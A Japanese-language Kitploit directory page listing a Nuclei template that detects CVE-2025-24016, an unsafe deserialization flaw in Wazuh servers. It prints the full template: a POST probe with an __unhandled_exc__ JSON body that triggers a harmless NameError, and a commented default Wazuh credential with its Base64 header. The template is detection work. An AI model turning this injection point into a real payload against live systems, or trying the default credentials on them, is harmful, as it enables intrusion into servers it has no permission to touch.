Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24016-Nuclei-Template — CVE-2025-24016の安全でないデシリアライゼーションRCEをWazuhサーバーで検出するためのNucleiテンプレート。細工されたJSONペイロードによってNameErrorを引き起こします。 | Kitploit
ツール/GitHubGitHub/huseyinstif/cve-2025-24016-nuclei-template
脆弱性スキャナーコード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubhuseyinstif/cve-2025-24016-nuclei-template

CVE-2025-24016-Nuclei-Template

CVE-2025-24016の安全でないデシリアライゼーションRCEをWazuhサーバーで検出するためのNucleiテンプレート。細工されたJSONペイロードによってNameErrorを引き起こします。

リポジトリを見る
4141年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24016 Wazuh 安全でないデシリアライゼーション RCE 検出

このリポジトリには、CVE-2025-24016 として識別される Wazuh サーバーの安全でないデシリアライゼーション脆弱性を検出するための Nuclei テンプレートが含まれています。

テンプレートの詳細

root@kitploit:~
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"

使用方法

root@kitploit:~
nuclei -t CVE-2025-24016.yaml -u http://example.com

お問い合わせ

ご質問や詳細については、以下の連絡先までお問い合わせください:

  • LinkedIn
  • Twitter
ツールをダウンロード